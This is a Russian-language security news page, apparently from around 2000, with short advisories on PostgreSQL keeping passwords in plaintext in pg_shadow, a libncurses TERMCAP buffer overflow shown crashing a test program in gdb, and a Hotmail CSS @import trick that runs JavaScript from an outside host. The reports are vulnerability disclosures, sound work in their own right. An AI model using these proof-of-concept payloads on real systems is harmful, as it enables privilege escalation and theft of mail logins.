Главная
Архив новостей
Безопасность в Unix
Безопасность в Windows
Сборник FAQ'ов
Телефония, фрикинг
Кредитные карты
Криптография
Истории о хакерах
Программы, утилиты
_el@sp.sz.ru

RB2 Network

POSTGRESQL хранит пароли открытым текстом


Team Void


При переводе баз данных на другой сервер Robert van der Meulen /rvdm@CISTRON.NL/ обнаружил следующую проблему в методе, которым postgresql сохраняет пользовательские пароли:

box:/var/postgres/data# strings pg_shadow.
someaccountname
someaccountpasswd
someaccountname
someaccountpasswd


Пароли и имена пользователей сохраняются открытым текстом в файле pg_shadow. Данные файлы имеют владельцем пользователя postgres, и могут быть прочтены только им. Модифицирование данных файлов осуществляется через pgsql, защищённый паролем. Получение uid postgres, естественно, позволяет обойти механизм защиты паролями баз данных. Уязвимости подвержены версии 6.3.2 и 6.5.3.

ПЕРЕПОЛНЕНИЕ БУФФЕРА В libncurses.

Суидные программы, собранные с libncurses, подвержены переполнению буффера, что является общеизвестной ситуацией и может легко привести к захвату прав суперпользователя. Демонстрацмонный эксплоит прилагается:

lubi:venglin:~> cat tescik.c #include <ncurses.h> main() { initscr(); } lubi:venglin:~> cc -g -o te tescik.c -lncurses lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'` lubi:venglin:~> gdb ./te GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... (gdb) run Starting program: /usr/home/venglin/./te Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () Проблема присутствует в 3.4-STABLE, и ликвидирована в 4.0-STABLE и 5.0-CURRENT

ОЧЕРЕДНЫЕ ПРОБЛЕМЫ HOTMAIL И JAVASCRIPT

Джорж Гусински обнаружил очередную брешь в защите сервиса hotmail от вставки javascript в письма. При использовании в теле письма конструкций вида "@import url(http://host/hostile.css)" возможно подшить к письму свой стайл, в котором будет прописана последовательность команд Javascript, при помощи которой можно, например, перенаправить пользователя на подложную страницу входа на hotmail, и снять его логин/пароль.

Данный код требуется вставить в HTML-сообщение: <STYLE type=text/css> @import url(http://host.dom/test.css); </STYLE> А style.css, расположенный на host.dom, имеет следующее содержание: @import url(javascript:alert('JavaScript is executed')); @import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40, 39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84, 101,115,116,32,50,39,41,59))); От проблемы можно изббавиться, прекратив использование браузера Microsoft Internet Explorer.
 duke.


<== Back to main page